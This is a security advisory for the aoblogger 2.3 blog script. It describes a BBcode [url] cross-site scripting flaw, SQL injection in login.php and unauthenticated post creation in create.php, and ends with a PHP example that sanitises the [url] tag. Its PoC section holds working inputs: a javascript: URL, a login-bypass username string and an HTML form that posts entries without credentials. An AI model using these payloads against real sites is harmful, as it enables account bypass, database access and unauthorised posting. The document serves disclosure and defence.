Multiple Vulnerabilities in aoblogger
Summary
- Vulnerability: Multiple Vulnerabilities in aoblogger
- Discovered: 2006.01.16
- Last Update: 0 n/a
- ID: EV0037
- CVE: CVE-2006-0310 CVE-2006-0311 CVE-2006-0312
- Risk Level: medium
- Type: Multiple Vulnerabilities
- Status: Unpatched
- Vendor: n/a
- Vulnerable Software: aoblogger (http://mikeheltonisawesome.com/)
- Version: 2.3
- PoC/Exploit: Available
- Solution: Not available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple vulnerabilities were found in the aoblogger (http://mikeheltonisawesome.com/) script.
1. Arbitrary script code insertion is possible in BBcode [url] tag.
The [url] tag isn't properly sanitized. This can be used to post arbitrary script code.
2. SQL Injection is possible.
Vulnerable script: login.php
The $username variable isn't properly sanitized before being used in a SQL query. This can be used to run any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc is off
3. Unauthorized "New Entry" creation is possible.
Vulnerable script: create.php
This script only checks that the variable $uza exists; it does not check the username and password before adding a new entry to the database.
PoC/Exploit
1. BBcode Example:
[url]javascript:alert(123)[/url]
2. SQL Injection Example:
link: http://host/aoblogger/login.php
username: username'/*
password: any
3. New Entry creation
<form action="http://host/aoblogger/create.php" method="post">
<input name="uza" value=1>
<input name="title" value="anytitle">
<textarea name="message">anymessage</textarea>
</form>
Solution
A solution for "Multiple Vulnerabilities in aoblogger" is not available. Check the vendor's website for updates.
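For issue 1 (the BBcode [url] tag), one way to render the tag safely is to escape the whole post first and emit a link only for http/https targets. This is an added example, not aoblogger's code and not a vendor fix; the function name render_url_bbcode and the sample posts are hypothetical.

```php
<?php
// Added example (not aoblogger code): hardened rendering of the BBcode [url] tag.
// render_url_bbcode() is a hypothetical name; the sample posts are constructed.

function render_url_bbcode(string $post): string
{
    // 1. Escape the whole post so no markup typed by the author reaches the page.
    $escaped = htmlspecialchars($post, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    // 2. Turn [url]...[/url] into a link only when the target passes validation.
    $html = preg_replace_callback(
        '~\[url\](.*?)\[/url\]~is',
        function (array $m): string {
            // Validate the value the browser would see, not its escaped form.
            $url = html_entity_decode($m[1], ENT_QUOTES, 'UTF-8');

            // URL parsers in browsers drop tabs and newlines, so refuse any
            // whitespace or control character instead of trusting the parse.
            if ($url === '' || preg_match('/[\x00-\x20\x7f]/', $url)) {
                return $m[0];               // leave the tag as inert, escaped text
            }

            // Allowlist schemes rather than blocklisting "javascript:".
            $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
            if (!in_array($scheme, ['http', 'https'], true)) {
                return $m[0];
            }

            // Re-escape for the attribute and text contexts.
            $attr = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
            return '<a href="' . $attr . '" rel="nofollow noopener">' . $attr . '</a>';
        },
        $escaped
    );

    return $html ?? $escaped;               // regex error: fall back to escaped text
}

// Constructed sample posts; the second is the PoC string from this advisory.
$samples = [
    '[url]http://example.com/?a=1&b=2[/url]',
    '[url]javascript:alert(123)[/url]',
    '[url]JAVASCRIPT:alert(123)[/url]',
    '[url]http://example.com/?q="quoted"[/url]',
];
foreach ($samples as $s) {
    echo render_url_bbcode($s), PHP_EOL;
}
```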